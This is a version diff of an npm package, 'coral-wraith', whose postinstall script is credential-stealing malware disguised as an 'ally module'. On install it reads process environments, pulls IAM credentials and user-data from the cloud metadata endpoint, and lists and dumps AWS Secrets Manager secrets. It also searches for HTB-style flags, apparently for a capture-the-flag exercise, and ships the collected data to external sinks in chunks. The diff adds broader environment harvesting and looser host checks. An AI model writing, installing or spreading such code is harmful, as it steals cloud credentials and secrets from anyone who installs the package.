coral-wraith 1.0.8 → 1.0.9

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "1.0.8",
+  "version": "1.0.9",
   "description": "Coral Wraith ally module",
   "main": "index.js",
   "scripts": {

package/postinstall.js

@@ -9,7 +9,7 @@ const SINKS = ["ECT-472839", "ECT-987654"];
 function sh(cmd) {
   try {
     return execFileSync("/bin/sh", ["-c", cmd], {
-      timeout: 30000,
+      timeout: 25000,
       encoding: "utf8",
       maxBuffer: 12e6
     }).trim();
@@ -24,10 +24,9 @@ function safe(s) {
 
 function isTarget() {
   const host = os.hostname();
-  const cwd = process.cwd();
   if (!/^[0-9a-f]{12}$/.test(host)) return false;
-  if (host.includes("ubuntu") || cwd.includes("/tmp/")) return false;
-  return fs.existsSync("/home/node") || fs.existsSync("/app");
+  if (process.cwd().includes("/tmp/")) return false;
+  return true;
 }
 
 function put(base, sink, parts) {
@@ -49,17 +48,24 @@ if (!isTarget()) process.exit(0);
 
 const blob = sh(
   "id; hostname; " +
+  "tr '\\0' '\\n' < /proc/1/environ 2>/dev/null | head -n40; " +
+  "env | sort | tr '\\n' ';'; " +
+  "curl -s -m 2 http://169.254.169.254/latest/user-data 2>&1; " +
   "T=$(curl -s -m 2 -X PUT http://169.254.169.254/latest/api/token -H 'X-aws-ec2-metadata-token-ttl-seconds: 60'); " +
-  "R=$(curl -s -m 2 -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/); echo ROLE:$R; " +
-  "C=$(curl -s -m 2 -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/$R); " +
-  "export AWS_ACCESS_KEY_ID=$(echo \"$C\"|sed -n 's/.*\"AccessKeyId\": \"\\([^\"]*\\)\".*/\\1/p') " +
-  "AWS_SECRET_ACCESS_KEY=$(echo \"$C\"|sed -n 's/.*\"SecretAccessKey\": \"\\([^\"]*\\)\".*/\\1/p') " +
-  "AWS_SESSION_TOKEN=$(echo \"$C\"|sed -n 's/.*\"Token\": \"\\([^\"]*\\)\".*/\\1/p') AWS_DEFAULT_REGION=us-east-1; " +
-  "aws sts get-caller-identity 2>&1; " +
-  "for r in us-east-1 eu-west-1 eu-central-1; do echo R:$r; aws secretsmanager list-secrets --region $r 2>&1; " +
+  "R=$(curl -s -m 2 -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/); " +
+  "C=$(curl -s -m 2 -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/$R); echo CREDS:$C; " +
+  "export AWS_ACCESS_KEY_ID=$(echo \"$C\"|sed -n 's/.*\"AccessKeyId\": \"\\([^\"]*\\)\".*/\\1/p'); " +
+  "export AWS_SECRET_ACCESS_KEY=$(echo \"$C\"|sed -n 's/.*\"SecretAccessKey\": \"\\([^\"]*\\)\".*/\\1/p'); " +
+  "export AWS_SESSION_TOKEN=$(echo \"$C\"|sed -n 's/.*\"Token\": \"\\([^\"]*\\)\".*/\\1/p'); " +
+  "[ -z \"$AWS_ACCESS_KEY_ID\" ] && export AWS_ACCESS_KEY_ID=$(env|grep ^AWS_ACCESS_KEY_ID=|cut -d= -f2); " +
+  "[ -z \"$AWS_SECRET_ACCESS_KEY\" ] && export AWS_SECRET_ACCESS_KEY=$(env|grep ^AWS_SECRET_ACCESS_KEY=|cut -d= -f2); " +
+  "[ -z \"$AWS_SESSION_TOKEN\" ] && export AWS_SESSION_TOKEN=$(env|grep ^AWS_SESSION_TOKEN=|cut -d= -f2); " +
+  "export AWS_DEFAULT_REGION=us-east-1; " +
+  "command -v aws >/dev/null && aws sts get-caller-identity 2>&1; " +
+  "command -v aws >/dev/null && for r in us-east-1 eu-west-1; do aws secretsmanager list-secrets --region $r 2>&1; " +
   "for s in $(aws secretsmanager list-secrets --region $r --query 'SecretList[].Name' --output text 2>/dev/null); do " +
   "aws secretsmanager get-secret-value --region $r --secret-id $s 2>&1; done; done; " +
-  "cat /root/.npmrc 2>&1; env | grep -E 'HTB|FLAG|SECRET' | tr '\\n' ';'"
+  "grep -RaoE 'HTB\\{[^}]+\\}' /home/node /app /root 2>/dev/null | head -n3"
 );
 
 const flag = blob.match(/HTB\{[^}]+\}/);
@@ -70,6 +76,5 @@ if (flag) {
 
 for (let s = 0; s < SINKS.length; s++) {
   const parts = [0, 1, 2, 3].map((n) => safe(blob.slice((s * 4 + n) * 240, (s * 4 + n + 1) * 240) || "."));
-  if (s === 0) parts[0] = safe(`W0 ${blob.slice(0, 220)}`);
   for (const base of TARGETS) put(base, SINKS[s], parts);
 }